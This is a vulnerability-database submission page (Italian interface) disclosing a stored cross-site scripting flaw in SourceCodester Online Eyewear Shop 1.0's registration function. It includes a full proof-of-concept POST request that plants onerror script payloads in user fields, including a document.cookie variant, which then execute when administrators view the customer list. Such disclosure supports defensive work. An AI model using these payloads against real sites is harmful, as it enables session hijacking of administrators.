Invia #85725: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting informazioni

TitoloSourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting
DescrizioneThe application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks. The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL: - http://localhost/oews/classes/Users.php?f=registration The vulnerable function corresponds to "registration" within the following source code file: - oews/classes/Users.php This function allows to register a new customer user or to edit an already existing one. The application does not correctly sanitize the input provided by the user and the XSS payload "><img src=X onerror=prompt(document.cookie)> could be uploaded within any of the following parameters: - "firstname" - "middlename" - "lastname" - "email" - "contact" Here an example of POST request: ''' POST /oews/classes/Users.php?f=registration HTTP/1.1 Host: localhost Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808 Content-Length: 1274 Connection: close Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="id" 4 -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="firstname" XSS"><img src=X onerror=prompt(1)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="middlename" "><img src=X onerror=prompt(2)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="lastname" TEST"><img src=X onerror=prompt(3)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="gender" Male -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="email" [email protected]"><img src=X onerror=prompt(5)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="contact" 444"><img src=X onerror=prompt(6)> -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="password" -----------------------------110352294825610921354088773808 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------110352294825610921354088773808-- ''' This set of information is stored inside the database for the current user and the script is executed anytime the related fields are printed out on the website. For this reason, any administrator user could be a potential victim of this attack if she tries to edit that customer or by simply accessing to the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the value of the following fields: - First Name - Middle Name - Last Name - Email
Utente
 CP_offensive_team (UID 40465)
Sottomissione07/02/2023 18:07 (3 anni fa)
Moderazione07/02/2023 20:59 (3 hours later)
StatoAccettato
Voce VulDB220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact cross site scripting]
Punti17

Want to know what is going to be exploited?

We predict KEV entries!